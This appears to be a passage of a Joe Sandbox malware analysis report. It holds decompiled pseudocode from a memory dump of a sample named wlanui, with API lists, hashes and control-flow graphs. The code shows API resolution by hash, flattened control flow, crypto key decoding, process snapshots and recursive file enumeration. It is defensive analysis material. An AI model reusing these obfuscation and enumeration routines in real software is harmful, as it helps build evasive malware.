                                                        									_t92 =  *0x48dfcc;
                                                        									__eflags = _t92;
                                                        									if(_t92 == 0) {
                                                        										_t92 = E00483E60(_t57, E00483F00(0x26f5757c), 0xdd726439, _t120);
                                                        										 *0x48dfcc = _t92;
                                                        									}
                                                        									_t18 =  *0x48e544; // 0x314640
                                                        									_t5 = _t18 + 8; // 0x314648
                                                        									_t8 = _t18 + 0xc; // 0x2d80778
                                                        									 *_t92( *_t8, _v8, _v4, 0, 0, _t5);
                                                        									asm("sbb esi, esi");
                                                        									_t21 =  *0x48dcfc;
                                                        									_t108 = (_t108 & 0xf499d49f) + 0x344059be;
                                                        									__eflags = _t21;
                                                        									if(_t21 == 0) {
                                                        										_t21 = E00483E60(_t57, E00483F00(0x9bab0b12), 0x94189a2, _t120);
                                                        										 *0x48dcfc = _t21;
                                                        									}
                                                        									 *_t21(_v32);
                                                        									goto L22;
                                                        								} else {
                                                        									__eflags = _t108 - 0x256e6cce;
                                                        									if(_t108 != 0x256e6cce) {
                                                        										goto L22;
                                                        									} else {
                                                        										_t29 =  *0x48de74;
                                                        										__eflags = _t29;
                                                        										if(_t29 == 0) {
                                                        											_t29 = E00483E60(_t57, E00483F00(0x1829db83), 0xdee5385b, _t120);
                                                        											 *0x48de74 = _t29;
                                                        										}
                                                        										_t30 =  *_t29(0x10001, 0x13,  *_t106,  *((intOrPtr*)(_t106 + 4)), 0x8000, 0,  &_v8,  &_v4); // executed
                                                        										asm("sbb esi, esi");
                                                        										_t108 = ( ~_t30 & 0xe8f9cd45) + 0x344059be;
                                                        										continue;
                                                        									}
                                                        								}
                                                        							} else {
                                                        								if(_t123 == 0) {
                                                        									_t31 =  *0x48e494;
                                                        									_t119 =  *0x48e544; // 0x314640
                                                        									__eflags = _t31;
                                                        									if(_t31 == 0) {
                                                        										_t31 = E00483E60(_t57, E00483F00(0x9bab0b12), 0x7facde30, _t120);
                                                        										 *0x48e494 = _t31;
                                                        									}
                                                        									_t107 =  *_t31();
                                                        									_t33 =  *0x48df30;
                                                        									__eflags = _t33;
                                                        									if(_t33 == 0) {
                                                        										_t33 = E00483E60(_t57, E00483F00(0x9bab0b12), 0x5010a54d, _t120);
                                                        										 *0x48df30 = _t33;
                                                        									}
                                                        									 *_t33(_t107, 0, _t119);
                                                        									__eflags = 0;
                                                        									return 0;
                                                        								} else {
                                                        									if(_t108 == 0xd12bb4) {
                                                        										_t38 = E004842C0(_t57, 0x2c);
                                                        										 *0x48e544 = _t38;
                                                        										__eflags = _t38;
                                                        										if(_t38 == 0) {
                                                        											goto L23;
                                                        										} else {
                                                        											_t108 = 0x2628db0d;
                                                        											continue;
                                                        										}
                                                        									} else {
                                                        										if(_t108 != 0xc4be8e9) {
                                                        											goto L22;
                                                        										} else {
                                                        											_t39 =  *0x48db2c; // 0x0
                                                        											if(_t39 == 0) {
                                                        												_t39 = E00483E60(_t57, E00483F00(0x26f5757c), 0x16451606, _t120);
                                                        												 *0x48db2c = _t39;
                                                        											}
                                                        											_t76 =  *0x48e544; // 0x314640
                                                        											_t1 = _t76 + 0x10; // 0x2d80b20
                                                        											 *_t39( *_t1);
                                                        											_t108 = 0x3391fecf;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L51:
                                                        					}
                                                        					__eflags = _t108 - 0x344059be;
                                                        					if(__eflags > 0) {
                                                        						__eflags = _t108 - 0x39e547fe;
                                                        						if(_t108 != 0x39e547fe) {
                                                        							goto L22;
                                                        						} else {
                                                        							_t93 =  *0x48dea8;
                                                        							__eflags = _t93;
                                                        							if(_t93 == 0) {
                                                        								_t93 = E00483E60(_t57, E00483F00(0x26f5757c), 0x37463e2d, _t120);
                                                        								 *0x48dea8 = _t93;
                                                        							}
                                                        							_t24 =  *0x48e544; // 0x314640
                                                        							_t14 = _t24 + 0x1c; // 0x31465c
                                                        							_t15 = _t24 + 0xc; // 0x2d80778
                                                        							_t25 =  *_t93( *_t15, 0x8004, 0, 0, _t14);
                                                        							__eflags = _t25;
                                                        							if(_t25 != 0) {
                                                        								return 1;
                                                        							} else {
                                                        								_t108 = 0xc4be8e9;
                                                        								goto L1;
                                                        							}
                                                        						}
                                                        					} else {
                                                        						if(__eflags == 0) {
                                                        							_t43 =  *0x48dc90; // 0x0
                                                        							__eflags = _t43;
                                                        							if(_t43 == 0) {
                                                        								_t43 = E00483E60(_t57, E00483F00(0x26f5757c), 0x31bce963, _t120);
                                                        								 *0x48dc90 = _t43;
                                                        							}
                                                        							_t81 =  *0x48e544; // 0x314640
                                                        							_t13 = _t81 + 0xc; // 0x2d80778
                                                        							 *_t43( *_t13, 0);
                                                        							_t108 = 0xd8f2d46;
                                                        							goto L1;
                                                        						} else {
                                                        							__eflags = _t108 - 0x28da2e5d;
                                                        							if(_t108 == 0x28da2e5d) {
                                                        								_t100 =  *0x48de5c;
                                                        								__eflags = _t100;
                                                        								if(_t100 == 0) {
                                                        									_t100 = E00483E60(_t57, E00483F00(0x26f5757c), 0x295786c8, _t120);
                                                        									 *0x48de5c = _t100;
                                                        								}
                                                        								_t45 =  *0x48e544; // 0x314640
                                                        								_t11 = _t45 + 0x10; // 0x314650
                                                        								_t12 = _t45 + 0xc; // 0x2d80778
                                                        								_t46 =  *_t100( *_t12, 0x660e, 1, _t11);
                                                        								asm("sbb esi, esi");
                                                        								_t108 = ( ~_t46 & 0x0653492f) + 0x3391fecf;
                                                        								goto L1;
                                                        							} else {
                                                        								__eflags = _t108 - 0x3391fecf;
                                                        								if(_t108 != 0x3391fecf) {
                                                        									goto L22;
                                                        								} else {
                                                        									_t49 =  *0x48db2c; // 0x0
                                                        									__eflags = _t49;
                                                        									if(_t49 == 0) {
                                                        										_t49 = E00483E60(_t57, E00483F00(0x26f5757c), 0x16451606, _t120);
                                                        										 *0x48db2c = _t49;
                                                        									}
                                                        									_t87 =  *0x48e544; // 0x314640
                                                        									_t10 = _t87 + 8; // 0x2d809c8
                                                        									 *_t49( *_t10);
                                                        									_t108 = 0x344059be;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L51;
                                                        					L22:
                                                        					__eflags = _t108 - 0x1ee1b4ef;
                                                        				} while (_t108 != 0x1ee1b4ef);
                                                        				L23:
                                                        				__eflags = 0;
                                                        				return 0;
                                                        				goto L51;
                                                        			}





































                                                        0x004825e5
                                                        0x004825e7
                                                        0x004825e7
                                                        0x004825f0
                                                        0x004825f0
                                                        0x004825f0
                                                        0x004825f0
                                                        0x004825f6
                                                        0x00000000
                                                        0x00000000
                                                        0x004825fc
                                                        0x00482779
                                                        0x0048277e
                                                        0x00482780
                                                        0x00482793
                                                        0x00482798
                                                        0x00482798
                                                        0x0048279d
                                                        0x004827b2
                                                        0x004827b8
                                                        0x004827c0
                                                        0x00000000
                                                        0x00482602
                                                        0x00482602
                                                        0x00482608
                                                        0x0048267b
                                                        0x00482681
                                                        0x004826e9
                                                        0x004826ef
                                                        0x004826f1
                                                        0x00482709
                                                        0x0048270b
                                                        0x0048270b
                                                        0x00482711
                                                        0x00482716
                                                        0x00482726
                                                        0x00482729
                                                        0x0048272d
                                                        0x0048272f
                                                        0x0048273a
                                                        0x00482740
                                                        0x00482742
                                                        0x00482755
                                                        0x0048275a
                                                        0x0048275a
                                                        0x00482763
                                                        0x00000000
                                                        0x00482683
                                                        0x00482683
                                                        0x00482689
                                                        0x00000000
                                                        0x0048268f
                                                        0x0048268f
                                                        0x00482694
                                                        0x00482696
                                                        0x004826a9
                                                        0x004826ae
                                                        0x004826ae
                                                        0x004826d0
                                                        0x004826d6
                                                        0x004826de
                                                        0x00000000
                                                        0x004826de
                                                        0x00482689
                                                        0x0048260a
                                                        0x0048260a
                                                        0x00482912
                                                        0x00482917
                                                        0x0048291d
                                                        0x0048291f
                                                        0x00482932
                                                        0x00482937
                                                        0x00482937
                                                        0x0048293e
                                                        0x00482940
                                                        0x00482945
                                                        0x00482947
                                                        0x0048295a
                                                        0x0048295f
                                                        0x0048295f
                                                        0x00482968
                                                        0x0048296b
                                                        0x00482971
                                                        0x00482610
                                                        0x00482616
                                                        0x0048265f
                                                        0x00482664
                                                        0x00482669
                                                        0x0048266b
                                                        0x00000000
                                                        0x00482671
                                                        0x00482671
                                                        0x00000000
                                                        0x00482671
                                                        0x00482618
                                                        0x0048261e
                                                        0x00000000
                                                        0x00482624
                                                        0x00482624
                                                        0x0048262b
                                                        0x0048263e
                                                        0x00482643
                                                        0x00482643
                                                        0x00482648
                                                        0x0048264e
                                                        0x00482651
                                                        0x00482653
                                                        0x00000000
                                                        0x00482653
                                                        0x0048261e
                                                        0x00482616
                                                        0x0048260a
                                                        0x00482608
                                                        0x00000000
                                                        0x004825fc
                                                        0x004827cb
                                                        0x004827d1
                                                        0x004828b9
                                                        0x004828bf
                                                        0x00000000
                                                        0x004828c5
                                                        0x004828c5
                                                        0x004828cb
                                                        0x004828cd
                                                        0x004828e5
                                                        0x004828e7
                                                        0x004828e7
                                                        0x004828ed
                                                        0x004828f2
                                                        0x004828ff
                                                        0x00482902
                                                        0x00482904
                                                        0x00482906
                                                        0x0048297c
                                                        0x00482908
                                                        0x00482908
                                                        0x00000000
                                                        0x00482908
                                                        0x00482906
                                                        0x004827d7
                                                        0x004827d7
                                                        0x0048287e
                                                        0x00482883
                                                        0x00482885
                                                        0x00482898
                                                        0x0048289d
                                                        0x0048289d
                                                        0x004828a2
                                                        0x004828aa
                                                        0x004828ad
                                                        0x004828af
                                                        0x00000000
                                                        0x004827dd
                                                        0x004827dd
                                                        0x004827e3
                                                        0x0048282a
                                                        0x00482830
                                                        0x00482832
                                                        0x0048284a
                                                        0x0048284c
                                                        0x0048284c
                                                        0x00482852
                                                        0x00482857
                                                        0x00482862
                                                        0x00482865
                                                        0x0048286b
                                                        0x00482873
                                                        0x00000000
                                                        0x004827e5
                                                        0x004827e5
                                                        0x004827eb
                                                        0x00000000
                                                        0x004827f1
                                                        0x004827f1
                                                        0x004827f6
                                                        0x004827f8
                                                        0x0048280b
                                                        0x00482810
                                                        0x00482810
                                                        0x00482815
                                                        0x0048281b
                                                        0x0048281e
                                                        0x00482820
                                                        0x00000000
                                                        0x00482820
                                                        0x004827eb
                                                        0x004827e3
                                                        0x004827d7
                                                        0x00000000
                                                        0x00482765
                                                        0x00482765
                                                        0x00482765
                                                        0x00482772
                                                        0x00482772
                                                        0x00482778
                                                        0x00000000

                                                        APIs
                                                        • CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00008000,00000000,?,?), ref: 004826D0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                        • Associated: 0000000F.00000002.2335370463.0000000000480000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335386868.000000000048D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335391948.000000000048F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_480000_wlanui.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CryptDecodeObject
                                                        • String ID: ->F7$@F1
                                                        • API String ID: 1207547050-2637866518
                                                        • Opcode ID: 3e2b1efa8a20eb0ab54849129eb4933509f9b1459c1e7e28c51757d0be7de173
                                                        • Instruction ID: f1039ec3b9ba470d6d0e04e05970cdcdbe2749ceec353cc7671874938a952fc9
                                                        • Opcode Fuzzy Hash: 3e2b1efa8a20eb0ab54849129eb4933509f9b1459c1e7e28c51757d0be7de173
                                                        • Instruction Fuzzy Hash: 4C811671F001115BDB24BF6ADD50B2E3292AB54B14F054C3EEA05DB3A5FA788D00878D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 476 484c80-484c96 477 484ca0-484ca5 476->477 478 484cab 477->478 479 484d63-484d68 477->479 480 484cad-484cb2 478->480 481 484d24-484d2b 478->481 482 484d6a-484d6f 479->482 483 484d86-484d95 479->483 487 484d1a-484d1f 480->487 488 484cb4-484cb9 480->488 484 484d48-484d5e 481->484 486 484d2d-484d43 call 483f00 call 483e60 481->486 489 484d71-484d76 482->489 490 484db4-484dbb 482->490 483->484 485 484d97-484db2 call 483f00 call 483e60 483->485 484->477 485->484 486->484 487->477 494 484cbb-484cc0 488->494 495 484d02-484d18 488->495 489->477 491 484d7c-484d85 489->491 496 484dd8-484dd9 CloseHandle 490->496 497 484dbd-484dd3 call 483f00 call 483e60 490->497 494->489 500 484cc6-484ccd 494->500 495->477 503 484ddb-484de4 496->503 497->496 507 484cea-484cf5 CreateToolhelp32Snapshot 500->507 508 484ccf-484ce5 call 483f00 call 483e60 500->508 507->503 514 484cfb-484d00 507->514 508->507 514->477
                                                        C-Code - Quality: 74%
                                                        			E00484C80(intOrPtr* __ecx, void* __edx) {
                                                        				char _v556;
                                                        				void* _v560;
                                                        				void* __ebx;
                                                        				void* _t5;
                                                        				intOrPtr* _t6;
                                                        				signed int _t7;
                                                        				int _t12;
                                                        				signed int _t17;
                                                        				intOrPtr _t20;
                                                        				void* _t21;
                                                        				intOrPtr* _t24;
                                                        				void* _t40;
                                                        				void* _t41;
                                                        				void* _t42;
                                                        				void* _t44;
                                                        
                                                        				_t41 = _v560;
                                                        				_t24 = __ecx;
                                                        				_t40 = __edx;
                                                        				_t5 = 0xf1114c0;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t44 = _t5 - 0x29f16ba1;
                                                        						if(_t44 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t44 == 0) {
                                                        							_t6 =  *0x48e498;
                                                        							if(_t6 == 0) {
                                                        								_t6 = E00483E60(_t24, E00483F00(0x9bab0b12), 0xb6f23f63, _t42);
                                                        								 *0x48e498 = _t6;
                                                        							}
                                                        							L14:
                                                        							_t7 =  *_t6(_t41,  &_v556);
                                                        							asm("sbb eax, eax");
                                                        							_t5 = ( ~_t7 & 0xe5fc70a2) + 0x2fd2b757;
                                                        							continue;
                                                        						} else {
                                                        							if(_t5 == 0xf1114c0) {
                                                        								_t5 = 0x1f097f05;
                                                        								continue;
                                                        							} else {
                                                        								if(_t5 == 0x15cf27f9) {
                                                        									_t17 =  *_t24( &_v556, _t40);
                                                        									asm("sbb eax, eax");
                                                        									_t5 = ( ~_t17 & 0xfa1eb44a) + 0x2fd2b757;
                                                        									continue;
                                                        								} else {
                                                        									if(_t5 != 0x1f097f05) {
                                                        										goto L17;
                                                        									} else {
                                                        										_t20 =  *0x48e290; // 0x7671733f
                                                        										if(_t20 == 0) {
                                                        											 *0x48e290 = E00483E60(_t24, E00483F00(0x9bab0b12), 0xbf0ea04d, _t42);
                                                        										}
                                                        										_t21 = CreateToolhelp32Snapshot(2, 0); // executed
                                                        										_t41 = _t21;
                                                        										if(_t41 == 0xffffffff) {
                                                        											return _t21;
                                                        										} else {
                                                        											_t5 = 0x2e0e6e55;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L25:
                                                        					}
                                                        					if(_t5 == 0x2e0e6e55) {
                                                        						_t6 =  *0x48e1b4;
                                                        						_v556 = 0x22c;
                                                        						if(_t6 == 0) {
                                                        							_t6 = E00483E60(_t24, E00483F00(0x9bab0b12), 0x188a0580, _t42);
                                                        							 *0x48e1b4 = _t6;
                                                        						}
                                                        						goto L14;
                                                        					} else {
                                                        						if(_t5 == 0x2fd2b757) {
                                                        							if( *0x48de3c == 0) {
                                                        								 *0x48de3c = E00483E60(_t24, E00483F00(0x9bab0b12), 0x20de7595, _t42);
                                                        							}
                                                        							_t12 = CloseHandle(_t41); // executed
                                                        							return _t12;
                                                        						}
                                                        						goto L17;
                                                        					}
                                                        					goto L25;
                                                        					L17:
                                                        				} while (_t5 != 0x9d8354f);
                                                        				return _t5;
                                                        				goto L25;
                                                        			}


















                                                        0x00484c88
                                                        0x00484c8c
                                                        0x00484c8f
                                                        0x00484c91
                                                        0x00484c96
                                                        0x00484ca0
                                                        0x00484ca0
                                                        0x00484ca0
                                                        0x00484ca0
                                                        0x00484ca5
                                                        0x00000000
                                                        0x00000000
                                                        0x00484cab
                                                        0x00484d24
                                                        0x00484d2b
                                                        0x00484d3e
                                                        0x00484d43
                                                        0x00484d43
                                                        0x00484d48
                                                        0x00484d4e
                                                        0x00484d52
                                                        0x00484d59
                                                        0x00000000
                                                        0x00484cad
                                                        0x00484cb2
                                                        0x00484d1a
                                                        0x00000000
                                                        0x00484cb4
                                                        0x00484cb9
                                                        0x00484d08
                                                        0x00484d0c
                                                        0x00484d13
                                                        0x00000000
                                                        0x00484cbb
                                                        0x00484cc0
                                                        0x00000000
                                                        0x00484cc6
                                                        0x00484cc6
                                                        0x00484ccd
                                                        0x00484ce5
                                                        0x00484ce5
                                                        0x00484cee
                                                        0x00484cf0
                                                        0x00484cf5
                                                        0x00484de4
                                                        0x00484cfb
                                                        0x00484cfb
                                                        0x00000000
                                                        0x00484cfb
                                                        0x00484cf5
                                                        0x00484cc0
                                                        0x00484cb9
                                                        0x00484cb2
                                                        0x00000000
                                                        0x00484cab
                                                        0x00484d68
                                                        0x00484d86
                                                        0x00484d8b
                                                        0x00484d95
                                                        0x00484da8
                                                        0x00484dad
                                                        0x00484dad
                                                        0x00000000
                                                        0x00484d6a
                                                        0x00484d6f
                                                        0x00484dbb
                                                        0x00484dd3
                                                        0x00484dd3
                                                        0x00484dd9
                                                        0x00000000
                                                        0x00484dd9
                                                        0x00000000
                                                        0x00484d6f
                                                        0x00000000
                                                        0x00484d71
                                                        0x00484d71
                                                        0x00484d85
                                                        0x00000000

                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00484CEE
                                                        • CloseHandle.KERNEL32(?,00000000,?,?), ref: 00484DD9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                        • Associated: 0000000F.00000002.2335370463.0000000000480000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335386868.000000000048D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335391948.000000000048F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_480000_wlanui.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateHandleSnapshotToolhelp32
                                                        • String ID: ?sqv
                                                        • API String ID: 3280610774-1358527836
                                                        • Opcode ID: 16a918abdf0de6644c44f0055c7a753feadd76cfea9833db1aa8eb80d1ea7159
                                                        • Instruction ID: 323943142e7987e8aea12c5c77a9bc7dc7ad084c1eb2f20eaefef295d1bf3772
                                                        • Opcode Fuzzy Hash: 16a918abdf0de6644c44f0055c7a753feadd76cfea9833db1aa8eb80d1ea7159
                                                        • Instruction Fuzzy Hash: ED31BE31A0421247CB28BF7AE88563F22D99BE0B58B544C3FB615DB3A1F62CCD45539E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 519 4838f0-48390b 520 483910-483915 519->520 521 483a69-483a6e 520->521 522 48391b 520->522 523 483acc-483adf call 4834c0 521->523 524 483a70-483a75 521->524 525 483a5f-483a64 522->525 526 483921-483926 522->526 540 483afc-483b17 523->540 541 483ae1-483af7 call 483f00 call 483e60 523->541 527 483ab6-483abb 524->527 528 483a77-483a7e 524->528 525->520 529 48392c-483931 526->529 530 483a17-483a1e 526->530 527->520 537 483ac1-483acb 527->537 533 483a9b-483ab1 528->533 534 483a80-483a96 call 483f00 call 483e60 528->534 538 483b70-483b77 529->538 539 483937-48393c 529->539 535 483a3b-483a4f FindFirstFileW 530->535 536 483a20-483a36 call 483f00 call 483e60 530->536 533->520 534->533 546 483a55-483a5a 535->546 547 483b97-483ba1 535->547 536->535 544 483b79-483b8f call 483f00 call 483e60 538->544 545 483b94 538->545 539->527 548 483942-483947 539->548 569 483b19-483b2f call 483f00 call 483e60 540->569 570 483b34-483b3f 540->570 541->540 544->545 545->547 546->520 549 48394d-483953 548->549 550 4839f1-483a12 548->550 556 483974-483976 549->556 557 483955-48395d 549->557 550->520 563 48396d-483972 556->563 566 483978-48398b call 4834c0 556->566 557->563 564 48395f-483963 557->564 563->520 564->556 573 483965-48396b 564->573 583 4839a8-4839ec call 4838f0 call 483460 566->583 584 48398d-4839a3 call 483f00 call 483e60 566->584 569->570 581 483b5c-483b6b 570->581 582 483b41-483b57 call 483f00 call 483e60 570->582 573->556 573->563 581->520 582->581 583->520 584->583
                                                        C-Code - Quality: 63%
                                                        			E004838F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                        				short _v524;
                                                        				char _v1044;
                                                        				short _v1588;
                                                        				intOrPtr _v1590;
                                                        				struct _WIN32_FIND_DATAW _v1636;
                                                        				void* _v1640;
                                                        				intOrPtr _v1652;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t22;
                                                        				intOrPtr* _t24;
                                                        				intOrPtr* _t26;
                                                        				intOrPtr* _t28;
                                                        				intOrPtr* _t33;
                                                        				signed int _t34;
                                                        				void* _t39;
                                                        				intOrPtr* _t42;
                                                        				signed int _t46;
                                                        				intOrPtr* _t50;
                                                        				intOrPtr _t55;
                                                        				void* _t56;
                                                        				void* _t91;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        				void* _t94;
                                                        				void* _t95;
                                                        				void* _t96;
                                                        				void* _t98;
                                                        
                                                        				_t91 = __ecx;
                                                        				_t95 = __edx;
                                                        				_v1640 = __ecx;
                                                        				_t22 = 0x25a25425;
                                                        				_t56 = _v1640;
                                                        				while(1) {
                                                        					L1:
                                                        					_t98 = _t22 - 0x25a25425;
                                                        					if(_t98 > 0) {
                                                        						break;
                                                        					}
                                                        					if(_t98 == 0) {
                                                        						_t22 = 0x29bc40d3;
                                                        						continue;
                                                        					} else {
                                                        						if(_t22 == 0x8a099c9) {
                                                        							if( *0x48e430 == 0) {
                                                        								 *0x48e430 = E00483E60(_t56, E00483F00(0x9bab0b12), 0x83efb111, _t95);
                                                        							}
                                                        							_t39 = FindFirstFileW( &_v524,  &_v1636); // executed
                                                        							_t56 = _t39;
                                                        							if(_t56 == 0xffffffff) {
                                                        								return _t39;
                                                        							} else {
                                                        								_t22 = 0x1a4f9837;
                                                        								continue;
                                                        							}
                                                        						} else {
                                                        							if(_t22 == 0xb46fa16) {
                                                        								_t42 =  *0x48dba4;
                                                        								if(_t42 == 0) {
                                                        									_t42 = E00483E60(_t56, E00483F00(0x9bab0b12), 0xd274268a, _t95);
                                                        									 *0x48dba4 = _t42;
                                                        								}
                                                        								return  *_t42(_t56);
                                                        							}
                                                        							if(_t22 != 0x1a4f9837) {
                                                        								L27:
                                                        								if(_t22 != 0x55fa1f4) {
                                                        									continue;
                                                        								} else {
                                                        									return _t22;
                                                        								}
                                                        							} else {
                                                        								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
                                                        									_t46 = _a4( &_v1636, _a8);
                                                        									asm("sbb eax, eax");
                                                        									_t22 = ( ~_t46 & 0x2b8487c8) + 0xb46fa16;
                                                        								} else {
                                                        									if(_v1636.cFileName != 0x2e) {
                                                        										L12:
                                                        										if(_t95 == 0) {
                                                        											goto L11;
                                                        										} else {
                                                        											_t94 = E004834C0(0x48d290);
                                                        											_t50 =  *0x48e158;
                                                        											if(_t50 == 0) {
                                                        												_t50 = E00483E60(_t56, E00483F00(0xc6fbcd74), 0xba71dd03, _t95);
                                                        												 *0x48e158 = _t50;
                                                        											}
                                                        											 *_t50( &_v1044, 0x104, _t94, _t91,  &(_v1636.cFileName));
                                                        											E004838F0( &_v1044, _t95, _a4, _a8);
                                                        											_t96 = _t96 + 0x1c;
                                                        											E00483460(_t94);
                                                        											_t22 = 0x36cb81de;
                                                        										}
                                                        									} else {
                                                        										_t55 = _v1590;
                                                        										if(_t55 == 0 || _t55 == 0x2e && _v1588 == 0) {
                                                        											L11:
                                                        											_t22 = 0x36cb81de;
                                                        										} else {
                                                        											goto L12;
                                                        										}
                                                        									}
                                                        								}
                                                        								continue;
                                                        							}
                                                        						}
                                                        					}
                                                        					L40:
                                                        				}
                                                        				if(_t22 == 0x29bc40d3) {
                                                        					_t93 = E004834C0(0x48d260);
                                                        					_t24 =  *0x48e158;
                                                        					if(_t24 == 0) {
                                                        						_t24 = E00483E60(_t56, E00483F00(0xc6fbcd74), 0xba71dd03, _t95);
                                                        						 *0x48e158 = _t24;
                                                        					}
                                                        					 *_t24( &_v524, 0x104, _t93, _t91);
                                                        					_t26 =  *0x48e494;
                                                        					_t96 = _t96 + 0x10;
                                                        					if(_t26 == 0) {
                                                        						_t26 = E00483E60(_t56, E00483F00(0x9bab0b12), 0x7facde30, _t95);
                                                        						 *0x48e494 = _t26;
                                                        					}
                                                        					_t92 =  *_t26();
                                                        					_t28 =  *0x48df30;
                                                        					if(_t28 == 0) {
                                                        						_t28 = E00483E60(_t56, E00483F00(0x9bab0b12), 0x5010a54d, _t95);
                                                        						 *0x48df30 = _t28;
                                                        					}
                                                        					 *_t28(_t92, 0, _t93);
                                                        					_t91 = _v1652;
                                                        					_t22 = 0x8a099c9;
                                                        					goto L1;
                                                        				} else {
                                                        					if(_t22 != 0x36cb81de) {
                                                        						goto L27;
                                                        					} else {
                                                        						_t33 =  *0x48df88;
                                                        						if(_t33 == 0) {
                                                        							_t33 = E00483E60(_t56, E00483F00(0x9bab0b12), 0xa53a5b1a, _t95);
                                                        							 *0x48df88 = _t33;
                                                        						}
                                                        						_t34 =  *_t33(_t56,  &_v1636);
                                                        						asm("sbb eax, eax");
                                                        						_t22 = ( ~_t34 & 0x0f089e21) + 0xb46fa16;
                                                        						goto L1;
                                                        					}
                                                        				}
                                                        				goto L40;
                                                        			}































                                                        0x004838fa
                                                        0x004838fc
                                                        0x004838fe
                                                        0x00483902
                                                        0x00483907
                                                        0x00483910
                                                        0x00483910
                                                        0x00483910
                                                        0x00483915
                                                        0x00000000
                                                        0x00000000
                                                        0x0048391b
                                                        0x00483a5f
                                                        0x00000000
                                                        0x00483921
                                                        0x00483926
                                                        0x00483a1e
                                                        0x00483a36
                                                        0x00483a36
                                                        0x00483a48
                                                        0x00483a4a
                                                        0x00483a4f
                                                        0x00483ba1
                                                        0x00483a55
                                                        0x00483a55
                                                        0x00000000
                                                        0x00483a55
                                                        0x0048392c
                                                        0x00483931
                                                        0x00483b70
                                                        0x00483b77
                                                        0x00483b8a
                                                        0x00483b8f
                                                        0x00483b8f
                                                        0x00000000
                                                        0x00483b95
                                                        0x0048393c
                                                        0x00483ab6
                                                        0x00483abb
                                                        0x00000000
                                                        0x00483acb
                                                        0x00483acb
                                                        0x00483acb
                                                        0x00483942
                                                        0x00483947
                                                        0x004839fd
                                                        0x00483a06
                                                        0x00483a0d
                                                        0x0048394d
                                                        0x00483953
                                                        0x00483974
                                                        0x00483976
                                                        0x00000000
                                                        0x00483978
                                                        0x00483982
                                                        0x00483984
                                                        0x0048398b
                                                        0x0048399e
                                                        0x004839a3
                                                        0x004839a3
                                                        0x004839bc
                                                        0x004839d8
                                                        0x004839dd
                                                        0x004839e2
                                                        0x004839e7
                                                        0x004839e7
                                                        0x00483955
                                                        0x00483955
                                                        0x0048395d
                                                        0x0048396d
                                                        0x0048396d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0048395d
                                                        0x00483953
                                                        0x00000000
                                                        0x00483947
                                                        0x0048393c
                                                        0x00483926
                                                        0x00000000
                                                        0x0048391b
                                                        0x00483a6e
                                                        0x00483ad6
                                                        0x00483ad8
                                                        0x00483adf
                                                        0x00483af2
                                                        0x00483af7
                                                        0x00483af7
                                                        0x00483b0b
                                                        0x00483b0d
                                                        0x00483b12
                                                        0x00483b17
                                                        0x00483b2a
                                                        0x00483b2f
                                                        0x00483b2f
                                                        0x00483b36
                                                        0x00483b38
                                                        0x00483b3f
                                                        0x00483b52
                                                        0x00483b57
                                                        0x00483b57
                                                        0x00483b60
                                                        0x00483b62
                                                        0x00483b66
                                                        0x00000000
                                                        0x00483a70
                                                        0x00483a75
                                                        0x00000000
                                                        0x00483a77
                                                        0x00483a77
                                                        0x00483a7e
                                                        0x00483a91
                                                        0x00483a96
                                                        0x00483a96
                                                        0x00483aa1
                                                        0x00483aa5
                                                        0x00483aac
                                                        0x00000000
                                                        0x00483aac
                                                        0x00483a75
                                                        0x00000000

                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00483A48
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                        • Associated: 0000000F.00000002.2335370463.0000000000480000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335386868.000000000048D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335391948.000000000048F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_480000_wlanui.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID: .
                                                        • API String ID: 1974802433-248832578
                                                        • Opcode ID: 9f31964077c32ff6bb45019578e10f446928c9debf0577bf0e453aa512fd8d94
                                                        • Instruction ID: 529158c8867a9ebc7e21cc315085d24542ab490d415ea6f637f1ce30c16f0e82
                                                        • Opcode Fuzzy Hash: 9f31964077c32ff6bb45019578e10f446928c9debf0577bf0e453aa512fd8d94
